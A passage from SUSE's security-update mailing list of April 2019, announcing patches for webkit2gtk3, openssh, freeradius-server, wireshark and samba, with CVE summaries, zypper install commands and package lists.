ntfsprogs-2013.1.13-5.6.1 ntfsprogs-debuginfo-2013.1.13-5.6.1 - SUSE Linux Enterprise Desktop 12-SP3 (x86_64): libntfs-3g84-2013.1.13-5.6.1 libntfs-3g84-debuginfo-2013.1.13-5.6.1 ntfs-3g-2013.1.13-5.6.1 ntfs-3g-debuginfo-2013.1.13-5.6.1 ntfs-3g_ntfsprogs-debugsource-2013.1.13-5.6.1 ntfsprogs-2013.1.13-5.6.1 ntfsprogs-debuginfo-2013.1.13-5.6.1 References: https://www.suse.com/security/cve/CVE-2019-9755.html https://bugzilla.suse.com/1130165 From sle-security-updates at lists.suse.com Thu Apr 25 07:10:20 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Thu, 25 Apr 2019 15:10:20 +0200 (CEST) Subject: SUSE-SU-2019:1030-1: moderate: Security update for webkit2gtk3 Message-ID: <20190425131021.001DEF3D3@maintenance.suse.de> SUSE Security Update: Security update for webkit2gtk3 ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1030-1 Rating: moderate References: #1126768 Cross-References: CVE-2019-8375 Affected Products: SUSE Linux Enterprise Workstation Extension 12-SP4 SUSE Linux Enterprise Workstation Extension 12-SP3 SUSE Linux Enterprise Software Development Kit 12-SP4 SUSE Linux Enterprise Software Development Kit 12-SP3 SUSE Linux Enterprise Server 12-SP4 SUSE Linux Enterprise Server 12-SP3 SUSE Linux Enterprise Desktop 12-SP4 SUSE Linux Enterprise Desktop 12-SP3 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for webkit2gtk3 fixes the following issues: Security issue fixed: - CVE-2019-8375: Fixed an issue in UIProcess subsystem which could allow the script dialog size to exceed the web view size leading to Buffer Overflow or other unspecified impact (bsc#1126768). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Workstation Extension 12-SP4: zypper in -t patch SUSE-SLE-WE-12-SP4-2019-1030=1 - SUSE Linux Enterprise Workstation Extension 12-SP3: zypper in -t patch SUSE-SLE-WE-12-SP3-2019-1030=1 - SUSE Linux Enterprise Software Development Kit 12-SP4: zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-1030=1 - SUSE Linux Enterprise Software Development Kit 12-SP3: zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-1030=1 - SUSE Linux Enterprise Server 12-SP4: zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-1030=1 - SUSE Linux Enterprise Server 12-SP3: zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-1030=1 - SUSE Linux Enterprise Desktop 12-SP4: zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-1030=1 - SUSE Linux Enterprise Desktop 12-SP3: zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-1030=1 Package List: - SUSE Linux Enterprise Workstation Extension 12-SP4 (noarch): libwebkit2gtk3-lang-2.24.0-2.38.2 - SUSE Linux Enterprise Workstation Extension 12-SP3 (noarch): libwebkit2gtk3-lang-2.24.0-2.38.2 - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64): typelib-1_0-WebKit2WebExtension-4_0-2.24.0-2.38.2 webkit2gtk3-debugsource-2.24.0-2.38.2 webkit2gtk3-devel-2.24.0-2.38.2 - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64): typelib-1_0-WebKit2WebExtension-4_0-2.24.0-2.38.2 webkit2gtk3-debugsource-2.24.0-2.38.2 webkit2gtk3-devel-2.24.0-2.38.2 - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64): libjavascriptcoregtk-4_0-18-2.24.0-2.38.2 libjavascriptcoregtk-4_0-18-debuginfo-2.24.0-2.38.2 libwebkit2gtk-4_0-37-2.24.0-2.38.2 libwebkit2gtk-4_0-37-debuginfo-2.24.0-2.38.2 typelib-1_0-JavaScriptCore-4_0-2.24.0-2.38.2 typelib-1_0-WebKit2-4_0-2.24.0-2.38.2 webkit2gtk-4_0-injected-bundles-2.24.0-2.38.2 webkit2gtk-4_0-injected-bundles-debuginfo-2.24.0-2.38.2 webkit2gtk3-debugsource-2.24.0-2.38.2 - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64): libjavascriptcoregtk-4_0-18-2.24.0-2.38.2 libjavascriptcoregtk-4_0-18-debuginfo-2.24.0-2.38.2 libwebkit2gtk-4_0-37-2.24.0-2.38.2 libwebkit2gtk-4_0-37-debuginfo-2.24.0-2.38.2 typelib-1_0-JavaScriptCore-4_0-2.24.0-2.38.2 typelib-1_0-WebKit2-4_0-2.24.0-2.38.2 webkit2gtk-4_0-injected-bundles-2.24.0-2.38.2 webkit2gtk-4_0-injected-bundles-debuginfo-2.24.0-2.38.2 webkit2gtk3-debugsource-2.24.0-2.38.2 - SUSE Linux Enterprise Desktop 12-SP4 (x86_64): libjavascriptcoregtk-4_0-18-2.24.0-2.38.2 libjavascriptcoregtk-4_0-18-debuginfo-2.24.0-2.38.2 libwebkit2gtk-4_0-37-2.24.0-2.38.2 libwebkit2gtk-4_0-37-debuginfo-2.24.0-2.38.2 typelib-1_0-JavaScriptCore-4_0-2.24.0-2.38.2 typelib-1_0-WebKit2-4_0-2.24.0-2.38.2 webkit2gtk-4_0-injected-bundles-2.24.0-2.38.2 webkit2gtk-4_0-injected-bundles-debuginfo-2.24.0-2.38.2 webkit2gtk3-debugsource-2.24.0-2.38.2 - SUSE Linux Enterprise Desktop 12-SP4 (noarch): libwebkit2gtk3-lang-2.24.0-2.38.2 - SUSE Linux Enterprise Desktop 12-SP3 (noarch): libwebkit2gtk3-lang-2.24.0-2.38.2 - SUSE Linux Enterprise Desktop 12-SP3 (x86_64): libjavascriptcoregtk-4_0-18-2.24.0-2.38.2 libjavascriptcoregtk-4_0-18-debuginfo-2.24.0-2.38.2 libwebkit2gtk-4_0-37-2.24.0-2.38.2 libwebkit2gtk-4_0-37-debuginfo-2.24.0-2.38.2 typelib-1_0-JavaScriptCore-4_0-2.24.0-2.38.2 typelib-1_0-WebKit2-4_0-2.24.0-2.38.2 webkit2gtk-4_0-injected-bundles-2.24.0-2.38.2 webkit2gtk-4_0-injected-bundles-debuginfo-2.24.0-2.38.2 webkit2gtk3-debugsource-2.24.0-2.38.2 References: https://www.suse.com/security/cve/CVE-2019-8375.html https://bugzilla.suse.com/1126768 From sle-security-updates at lists.suse.com Thu Apr 25 07:11:00 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Thu, 25 Apr 2019 15:11:00 +0200 (CEST) Subject: SUSE-SU-2019:14030-1: moderate: Security update for openssh Message-ID: <20190425131100.0FFE9F3D3@maintenance.suse.de> SUSE Security Update: Security update for openssh ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:14030-1 Rating: moderate References: #1090671 #1115550 #1119183 #1121816 #1121821 #1131709 Cross-References: CVE-2019-6109 CVE-2019-6111 Affected Products: SUSE Linux Enterprise Server 11-SP4-LTSS SUSE Linux Enterprise Debuginfo 11-SP4 ______________________________________________________________________________ An update that solves two vulnerabilities and has four fixes is now available. Description: This update for openssh fixes the following issues: Security vulnerabilities addressed: - CVE-2019-6109: Fixed an character encoding issue in the progress display of the scp client that could be used to manipulate client output, allowing for spoofing during file transfers (bsc#1121816). - CVE-2019-6111: Properly validate object names received by the scp client to prevent arbitrary file overwrites when interacting with a malicious SSH server (bsc#1121821). Other issues fixed: - Fixed two race conditions in sshd relating to SIGHUP (bsc#1119183). - Returned proper reason for port forwarding failures (bsc#1090671). - Fixed SSHD termination of multichannel sessions with non-root users (bsc#1115550). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Server 11-SP4-LTSS: zypper in -t patch slessp4-openssh-14030=1 - SUSE Linux Enterprise Debuginfo 11-SP4: zypper in -t patch dbgsp4-openssh-14030=1 Package List: - SUSE Linux Enterprise Server 11-SP4-LTSS (i586 ppc64 s390x x86_64): openssh-6.6p1-36.20.1 openssh-askpass-gnome-6.6p1-36.20.1 openssh-fips-6.6p1-36.20.1 openssh-helpers-6.6p1-36.20.1 - SUSE Linux Enterprise Debuginfo 11-SP4 (i586 ppc64 s390x x86_64): openssh-askpass-gnome-debuginfo-6.6p1-36.20.1 openssh-debuginfo-6.6p1-36.20.1 openssh-debugsource-6.6p1-36.20.1 References: https://www.suse.com/security/cve/CVE-2019-6109.html https://www.suse.com/security/cve/CVE-2019-6111.html https://bugzilla.suse.com/1090671 https://bugzilla.suse.com/1115550 https://bugzilla.suse.com/1119183 https://bugzilla.suse.com/1121816 https://bugzilla.suse.com/1121821 https://bugzilla.suse.com/1131709 From sle-security-updates at lists.suse.com Thu Apr 25 10:10:41 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Thu, 25 Apr 2019 18:10:41 +0200 (CEST) Subject: SUSE-SU-2019:1039-1: important: Security update for freeradius-server Message-ID: <20190425161041.D5769F3D3@maintenance.suse.de> SUSE Security Update: Security update for freeradius-server ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1039-1 Rating: important References: #1132549 #1132664 Cross-References: CVE-2019-11234 CVE-2019-11235 Affected Products: SUSE OpenStack Cloud 7 SUSE Linux Enterprise Server for SAP 12-SP2 SUSE Linux Enterprise Server for SAP 12-SP1 SUSE Linux Enterprise Server 12-SP2-LTSS SUSE Linux Enterprise Server 12-SP2-BCL SUSE Linux Enterprise Server 12-SP1-LTSS SUSE Linux Enterprise Server 12-LTSS SUSE Enterprise Storage 4 ______________________________________________________________________________ An update that fixes two vulnerabilities is now available. Description: This update for freeradius-server fixes the following issues: Security issues fixed: - CVE-2019-11235: Fixed an authentication bypass related to the EAP-PWD Commit frame and insufficent validation of elliptic curve points (bsc#1132549). - CVE-2019-11234: Fixed an authentication bypass caused by reflecting privous values back to the server (bsc#1132664). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE OpenStack Cloud 7: zypper in -t patch SUSE-OpenStack-Cloud-7-2019-1039=1 - SUSE Linux Enterprise Server for SAP 12-SP2: zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-1039=1 - SUSE Linux Enterprise Server for SAP 12-SP1: zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1039=1 - SUSE Linux Enterprise Server 12-SP2-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-1039=1 - SUSE Linux Enterprise Server 12-SP2-BCL: zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2019-1039=1 - SUSE Linux Enterprise Server 12-SP1-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-1039=1 - SUSE Linux Enterprise Server 12-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-2019-1039=1 - SUSE Enterprise Storage 4: zypper in -t patch SUSE-Storage-4-2019-1039=1 Package List: - SUSE OpenStack Cloud 7 (s390x x86_64): freeradius-server-3.0.3-17.12.1 freeradius-server-debuginfo-3.0.3-17.12.1 freeradius-server-debugsource-3.0.3-17.12.1 freeradius-server-doc-3.0.3-17.12.1 freeradius-server-krb5-3.0.3-17.12.1 freeradius-server-krb5-debuginfo-3.0.3-17.12.1 freeradius-server-ldap-3.0.3-17.12.1 freeradius-server-ldap-debuginfo-3.0.3-17.12.1 freeradius-server-libs-3.0.3-17.12.1 freeradius-server-libs-debuginfo-3.0.3-17.12.1 freeradius-server-mysql-3.0.3-17.12.1 freeradius-server-mysql-debuginfo-3.0.3-17.12.1 freeradius-server-perl-3.0.3-17.12.1 freeradius-server-perl-debuginfo-3.0.3-17.12.1 freeradius-server-postgresql-3.0.3-17.12.1 freeradius-server-postgresql-debuginfo-3.0.3-17.12.1 freeradius-server-python-3.0.3-17.12.1 freeradius-server-python-debuginfo-3.0.3-17.12.1 freeradius-server-sqlite-3.0.3-17.12.1 freeradius-server-sqlite-debuginfo-3.0.3-17.12.1 freeradius-server-utils-3.0.3-17.12.1 freeradius-server-utils-debuginfo-3.0.3-17.12.1 - SUSE Linux Enterprise Server for SAP 12-SP2 (ppc64le x86_64): freeradius-server-3.0.3-17.12.1 freeradius-server-debuginfo-3.0.3-17.12.1 freeradius-server-debugsource-3.0.3-17.12.1 freeradius-server-doc-3.0.3-17.12.1 freeradius-server-krb5-3.0.3-17.12.1 freeradius-server-krb5-debuginfo-3.0.3-17.12.1 freeradius-server-ldap-3.0.3-17.12.1 freeradius-server-ldap-debuginfo-3.0.3-17.12.1 freeradius-server-libs-3.0.3-17.12.1 freeradius-server-libs-debuginfo-3.0.3-17.12.1 freeradius-server-mysql-3.0.3-17.12.1 freeradius-server-mysql-debuginfo-3.0.3-17.12.1 freeradius-server-perl-3.0.3-17.12.1 freeradius-server-perl-debuginfo-3.0.3-17.12.1 freeradius-server-postgresql-3.0.3-17.12.1 freeradius-server-postgresql-debuginfo-3.0.3-17.12.1 freeradius-server-python-3.0.3-17.12.1 freeradius-server-python-debuginfo-3.0.3-17.12.1 freeradius-server-sqlite-3.0.3-17.12.1 freeradius-server-sqlite-debuginfo-3.0.3-17.12.1 freeradius-server-utils-3.0.3-17.12.1 freeradius-server-utils-debuginfo-3.0.3-17.12.1 - SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64): freeradius-server-3.0.3-17.12.1 freeradius-server-debuginfo-3.0.3-17.12.1 freeradius-server-debugsource-3.0.3-17.12.1 freeradius-server-doc-3.0.3-17.12.1 freeradius-server-krb5-3.0.3-17.12.1 freeradius-server-krb5-debuginfo-3.0.3-17.12.1 freeradius-server-ldap-3.0.3-17.12.1 freeradius-server-ldap-debuginfo-3.0.3-17.12.1 freeradius-server-libs-3.0.3-17.12.1 freeradius-server-libs-debuginfo-3.0.3-17.12.1 freeradius-server-mysql-3.0.3-17.12.1 freeradius-server-mysql-debuginfo-3.0.3-17.12.1 freeradius-server-perl-3.0.3-17.12.1 freeradius-server-perl-debuginfo-3.0.3-17.12.1 freeradius-server-postgresql-3.0.3-17.12.1 freeradius-server-postgresql-debuginfo-3.0.3-17.12.1 freeradius-server-python-3.0.3-17.12.1 freeradius-server-python-debuginfo-3.0.3-17.12.1 freeradius-server-sqlite-3.0.3-17.12.1 freeradius-server-sqlite-debuginfo-3.0.3-17.12.1 freeradius-server-utils-3.0.3-17.12.1 freeradius-server-utils-debuginfo-3.0.3-17.12.1 - SUSE Linux Enterprise Server 12-SP2-LTSS (ppc64le s390x x86_64): freeradius-server-3.0.3-17.12.1 freeradius-server-debuginfo-3.0.3-17.12.1 freeradius-server-debugsource-3.0.3-17.12.1 freeradius-server-doc-3.0.3-17.12.1 freeradius-server-krb5-3.0.3-17.12.1 freeradius-server-krb5-debuginfo-3.0.3-17.12.1 freeradius-server-ldap-3.0.3-17.12.1 freeradius-server-ldap-debuginfo-3.0.3-17.12.1 freeradius-server-libs-3.0.3-17.12.1 freeradius-server-libs-debuginfo-3.0.3-17.12.1 freeradius-server-mysql-3.0.3-17.12.1 freeradius-server-mysql-debuginfo-3.0.3-17.12.1 freeradius-server-perl-3.0.3-17.12.1 freeradius-server-perl-debuginfo-3.0.3-17.12.1 freeradius-server-postgresql-3.0.3-17.12.1 freeradius-server-postgresql-debuginfo-3.0.3-17.12.1 freeradius-server-python-3.0.3-17.12.1 freeradius-server-python-debuginfo-3.0.3-17.12.1 freeradius-server-sqlite-3.0.3-17.12.1 freeradius-server-sqlite-debuginfo-3.0.3-17.12.1 freeradius-server-utils-3.0.3-17.12.1 freeradius-server-utils-debuginfo-3.0.3-17.12.1 - SUSE Linux Enterprise Server 12-SP2-BCL (x86_64): freeradius-server-3.0.3-17.12.1 freeradius-server-debuginfo-3.0.3-17.12.1 freeradius-server-debugsource-3.0.3-17.12.1 freeradius-server-doc-3.0.3-17.12.1 freeradius-server-krb5-3.0.3-17.12.1 freeradius-server-krb5-debuginfo-3.0.3-17.12.1 freeradius-server-ldap-3.0.3-17.12.1 freeradius-server-ldap-debuginfo-3.0.3-17.12.1 freeradius-server-libs-3.0.3-17.12.1 freeradius-server-libs-debuginfo-3.0.3-17.12.1 freeradius-server-mysql-3.0.3-17.12.1 freeradius-server-mysql-debuginfo-3.0.3-17.12.1 freeradius-server-perl-3.0.3-17.12.1 freeradius-server-perl-debuginfo-3.0.3-17.12.1 freeradius-server-postgresql-3.0.3-17.12.1 freeradius-server-postgresql-debuginfo-3.0.3-17.12.1 freeradius-server-python-3.0.3-17.12.1 freeradius-server-python-debuginfo-3.0.3-17.12.1 freeradius-server-sqlite-3.0.3-17.12.1 freeradius-server-sqlite-debuginfo-3.0.3-17.12.1 freeradius-server-utils-3.0.3-17.12.1 freeradius-server-utils-debuginfo-3.0.3-17.12.1 - SUSE Linux Enterprise Server 12-SP1-LTSS (ppc64le s390x x86_64): freeradius-server-3.0.3-17.12.1 freeradius-server-debuginfo-3.0.3-17.12.1 freeradius-server-debugsource-3.0.3-17.12.1 freeradius-server-doc-3.0.3-17.12.1 freeradius-server-krb5-3.0.3-17.12.1 freeradius-server-krb5-debuginfo-3.0.3-17.12.1 freeradius-server-ldap-3.0.3-17.12.1 freeradius-server-ldap-debuginfo-3.0.3-17.12.1 freeradius-server-libs-3.0.3-17.12.1 freeradius-server-libs-debuginfo-3.0.3-17.12.1 freeradius-server-mysql-3.0.3-17.12.1 freeradius-server-mysql-debuginfo-3.0.3-17.12.1 freeradius-server-perl-3.0.3-17.12.1 freeradius-server-perl-debuginfo-3.0.3-17.12.1 freeradius-server-postgresql-3.0.3-17.12.1 freeradius-server-postgresql-debuginfo-3.0.3-17.12.1 freeradius-server-python-3.0.3-17.12.1 freeradius-server-python-debuginfo-3.0.3-17.12.1 freeradius-server-sqlite-3.0.3-17.12.1 freeradius-server-sqlite-debuginfo-3.0.3-17.12.1 freeradius-server-utils-3.0.3-17.12.1 freeradius-server-utils-debuginfo-3.0.3-17.12.1 - SUSE Linux Enterprise Server 12-LTSS (ppc64le s390x x86_64): freeradius-server-3.0.3-17.12.1 freeradius-server-debuginfo-3.0.3-17.12.1 freeradius-server-debugsource-3.0.3-17.12.1 freeradius-server-doc-3.0.3-17.12.1 freeradius-server-krb5-3.0.3-17.12.1 freeradius-server-krb5-debuginfo-3.0.3-17.12.1 freeradius-server-ldap-3.0.3-17.12.1 freeradius-server-ldap-debuginfo-3.0.3-17.12.1 freeradius-server-libs-3.0.3-17.12.1 freeradius-server-libs-debuginfo-3.0.3-17.12.1 freeradius-server-mysql-3.0.3-17.12.1 freeradius-server-mysql-debuginfo-3.0.3-17.12.1 freeradius-server-perl-3.0.3-17.12.1 freeradius-server-perl-debuginfo-3.0.3-17.12.1 freeradius-server-postgresql-3.0.3-17.12.1 freeradius-server-postgresql-debuginfo-3.0.3-17.12.1 freeradius-server-python-3.0.3-17.12.1 freeradius-server-python-debuginfo-3.0.3-17.12.1 freeradius-server-sqlite-3.0.3-17.12.1 freeradius-server-sqlite-debuginfo-3.0.3-17.12.1 freeradius-server-utils-3.0.3-17.12.1 freeradius-server-utils-debuginfo-3.0.3-17.12.1 - SUSE Enterprise Storage 4 (x86_64): freeradius-server-3.0.3-17.12.1 freeradius-server-debuginfo-3.0.3-17.12.1 freeradius-server-debugsource-3.0.3-17.12.1 freeradius-server-doc-3.0.3-17.12.1 freeradius-server-krb5-3.0.3-17.12.1 freeradius-server-krb5-debuginfo-3.0.3-17.12.1 freeradius-server-ldap-3.0.3-17.12.1 freeradius-server-ldap-debuginfo-3.0.3-17.12.1 freeradius-server-libs-3.0.3-17.12.1 freeradius-server-libs-debuginfo-3.0.3-17.12.1 freeradius-server-mysql-3.0.3-17.12.1 freeradius-server-mysql-debuginfo-3.0.3-17.12.1 freeradius-server-perl-3.0.3-17.12.1 freeradius-server-perl-debuginfo-3.0.3-17.12.1 freeradius-server-postgresql-3.0.3-17.12.1 freeradius-server-postgresql-debuginfo-3.0.3-17.12.1 freeradius-server-python-3.0.3-17.12.1 freeradius-server-python-debuginfo-3.0.3-17.12.1 freeradius-server-sqlite-3.0.3-17.12.1 freeradius-server-sqlite-debuginfo-3.0.3-17.12.1 freeradius-server-utils-3.0.3-17.12.1 freeradius-server-utils-debuginfo-3.0.3-17.12.1 References: https://www.suse.com/security/cve/CVE-2019-11234.html https://www.suse.com/security/cve/CVE-2019-11235.html https://bugzilla.suse.com/1132549 https://bugzilla.suse.com/1132664 From sle-security-updates at lists.suse.com Thu Apr 25 10:12:34 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Thu, 25 Apr 2019 18:12:34 +0200 (CEST) Subject: SUSE-SU-2019:1036-1: moderate: Security update for wireshark Message-ID: <20190425161234.A6AE8F3D3@maintenance.suse.de> SUSE Security Update: Security update for wireshark ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1036-1 Rating: moderate References: #1131945 Cross-References: CVE-2019-10894 CVE-2019-10895 CVE-2019-10896 CVE-2019-10899 CVE-2019-10901 CVE-2019-10903 Affected Products: SUSE Linux Enterprise Module for Desktop Applications 15 SUSE Linux Enterprise Module for Basesystem 15 ______________________________________________________________________________ An update that fixes 6 vulnerabilities is now available. Description: This update for wireshark to version 2.4.14 fixes the following issues: Security issues fixed: - CVE-2019-10895: NetScaler file parser crash. - CVE-2019-10899: SRVLOC dissector crash. - CVE-2019-10894: GSS-API dissector crash. - CVE-2019-10896: DOF dissector crash. - CVE-2019-10901: LDSS dissector crash. - CVE-2019-10903: DCERPC SPOOLSS dissector crash. Non-security issue fixed: - Update to version 2.4.14 (bsc#1131945). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Desktop Applications 15: zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-2019-1036=1 - SUSE Linux Enterprise Module for Basesystem 15: zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-1036=1 Package List: - SUSE Linux Enterprise Module for Desktop Applications 15 (aarch64 ppc64le s390x x86_64): wireshark-debuginfo-2.4.14-3.25.2 wireshark-debugsource-2.4.14-3.25.2 wireshark-devel-2.4.14-3.25.2 wireshark-ui-qt-2.4.14-3.25.2 wireshark-ui-qt-debuginfo-2.4.14-3.25.2 - SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64): libwireshark9-2.4.14-3.25.2 libwireshark9-debuginfo-2.4.14-3.25.2 libwiretap7-2.4.14-3.25.2 libwiretap7-debuginfo-2.4.14-3.25.2 libwscodecs1-2.4.14-3.25.2 libwscodecs1-debuginfo-2.4.14-3.25.2 libwsutil8-2.4.14-3.25.2 libwsutil8-debuginfo-2.4.14-3.25.2 wireshark-2.4.14-3.25.2 wireshark-debuginfo-2.4.14-3.25.2 wireshark-debugsource-2.4.14-3.25.2 References: https://www.suse.com/security/cve/CVE-2019-10894.html https://www.suse.com/security/cve/CVE-2019-10895.html https://www.suse.com/security/cve/CVE-2019-10896.html https://www.suse.com/security/cve/CVE-2019-10899.html https://www.suse.com/security/cve/CVE-2019-10901.html https://www.suse.com/security/cve/CVE-2019-10903.html https://bugzilla.suse.com/1131945 From sle-security-updates at lists.suse.com Thu Apr 25 10:13:18 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Thu, 25 Apr 2019 18:13:18 +0200 (CEST) Subject: SUSE-SU-2019:1038-1: moderate: Security update for wireshark Message-ID: <20190425161318.B1741F3D3@maintenance.suse.de> SUSE Security Update: Security update for wireshark ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1038-1 Rating: moderate References: #1131945 Cross-References: CVE-2019-10894 CVE-2019-10895 CVE-2019-10896 CVE-2019-10899 CVE-2019-10901 CVE-2019-10903 Affected Products: SUSE Linux Enterprise Software Development Kit 12-SP4 SUSE Linux Enterprise Software Development Kit 12-SP3 SUSE Linux Enterprise Server 12-SP4 SUSE Linux Enterprise Server 12-SP3 SUSE Linux Enterprise Desktop 12-SP4 SUSE Linux Enterprise Desktop 12-SP3 ______________________________________________________________________________ An update that fixes 6 vulnerabilities is now available. Description: This update for wireshark to version 2.4.14 fixes the following issues: Security issues fixed: - CVE-2019-10895: NetScaler file parser crash. - CVE-2019-10899: SRVLOC dissector crash. - CVE-2019-10894: GSS-API dissector crash. - CVE-2019-10896: DOF dissector crash. - CVE-2019-10901: LDSS dissector crash. - CVE-2019-10903: DCERPC SPOOLSS dissector crash. Non-security issue fixed: - Update to version 2.4.14 (bsc#1131945). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Software Development Kit 12-SP4: zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-1038=1 - SUSE Linux Enterprise Software Development Kit 12-SP3: zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-1038=1 - SUSE Linux Enterprise Server 12-SP4: zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-1038=1 - SUSE Linux Enterprise Server 12-SP3: zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-1038=1 - SUSE Linux Enterprise Desktop 12-SP4: zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-1038=1 - SUSE Linux Enterprise Desktop 12-SP3: zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-1038=1 Package List: - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64): wireshark-debuginfo-2.4.14-48.45.1 wireshark-debugsource-2.4.14-48.45.1 wireshark-devel-2.4.14-48.45.1 - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64): wireshark-debuginfo-2.4.14-48.45.1 wireshark-debugsource-2.4.14-48.45.1 wireshark-devel-2.4.14-48.45.1 - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64): libwireshark9-2.4.14-48.45.1 libwireshark9-debuginfo-2.4.14-48.45.1 libwiretap7-2.4.14-48.45.1 libwiretap7-debuginfo-2.4.14-48.45.1 libwscodecs1-2.4.14-48.45.1 libwscodecs1-debuginfo-2.4.14-48.45.1 libwsutil8-2.4.14-48.45.1 libwsutil8-debuginfo-2.4.14-48.45.1 wireshark-2.4.14-48.45.1 wireshark-debuginfo-2.4.14-48.45.1 wireshark-debugsource-2.4.14-48.45.1 wireshark-gtk-2.4.14-48.45.1 wireshark-gtk-debuginfo-2.4.14-48.45.1 - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64): libwireshark9-2.4.14-48.45.1 libwireshark9-debuginfo-2.4.14-48.45.1 libwiretap7-2.4.14-48.45.1 libwiretap7-debuginfo-2.4.14-48.45.1 libwscodecs1-2.4.14-48.45.1 libwscodecs1-debuginfo-2.4.14-48.45.1 libwsutil8-2.4.14-48.45.1 libwsutil8-debuginfo-2.4.14-48.45.1 wireshark-2.4.14-48.45.1 wireshark-debuginfo-2.4.14-48.45.1 wireshark-debugsource-2.4.14-48.45.1 wireshark-gtk-2.4.14-48.45.1 wireshark-gtk-debuginfo-2.4.14-48.45.1 - SUSE Linux Enterprise Desktop 12-SP4 (x86_64): libwireshark9-2.4.14-48.45.1 libwireshark9-debuginfo-2.4.14-48.45.1 libwiretap7-2.4.14-48.45.1 libwiretap7-debuginfo-2.4.14-48.45.1 libwscodecs1-2.4.14-48.45.1 libwscodecs1-debuginfo-2.4.14-48.45.1 libwsutil8-2.4.14-48.45.1 libwsutil8-debuginfo-2.4.14-48.45.1 wireshark-2.4.14-48.45.1 wireshark-debuginfo-2.4.14-48.45.1 wireshark-debugsource-2.4.14-48.45.1 wireshark-gtk-2.4.14-48.45.1 wireshark-gtk-debuginfo-2.4.14-48.45.1 - SUSE Linux Enterprise Desktop 12-SP3 (x86_64): libwireshark9-2.4.14-48.45.1 libwireshark9-debuginfo-2.4.14-48.45.1 libwiretap7-2.4.14-48.45.1 libwiretap7-debuginfo-2.4.14-48.45.1 libwscodecs1-2.4.14-48.45.1 libwscodecs1-debuginfo-2.4.14-48.45.1 libwsutil8-2.4.14-48.45.1 libwsutil8-debuginfo-2.4.14-48.45.1 wireshark-2.4.14-48.45.1 wireshark-debuginfo-2.4.14-48.45.1 wireshark-debugsource-2.4.14-48.45.1 wireshark-gtk-2.4.14-48.45.1 wireshark-gtk-debuginfo-2.4.14-48.45.1 References: https://www.suse.com/security/cve/CVE-2019-10894.html https://www.suse.com/security/cve/CVE-2019-10895.html https://www.suse.com/security/cve/CVE-2019-10896.html https://www.suse.com/security/cve/CVE-2019-10899.html https://www.suse.com/security/cve/CVE-2019-10901.html https://www.suse.com/security/cve/CVE-2019-10903.html https://bugzilla.suse.com/1131945 From sle-security-updates at lists.suse.com Thu Apr 25 10:14:02 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Thu, 25 Apr 2019 18:14:02 +0200 (CEST) Subject: SUSE-SU-2019:1037-1: moderate: Security update for samba Message-ID: <20190425161402.9EE47F3D3@maintenance.suse.de> SUSE Security Update: Security update for samba ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1037-1 Rating: moderate References: #1099590 #1123755 #1124223 #1127153 #1131060 Cross-References: CVE-2019-3880 Affected Products: SUSE Linux Enterprise Software Development Kit 12-SP4 SUSE Linux Enterprise Software Development Kit 12-SP3 SUSE Linux Enterprise Server 12-SP4 SUSE Linux Enterprise Server 12-SP3 SUSE Linux Enterprise High Availability 12-SP4 SUSE Linux Enterprise High Availability 12-SP3 SUSE Linux Enterprise Desktop 12-SP4 SUSE Linux Enterprise Desktop 12-SP3 SUSE Enterprise Storage 5 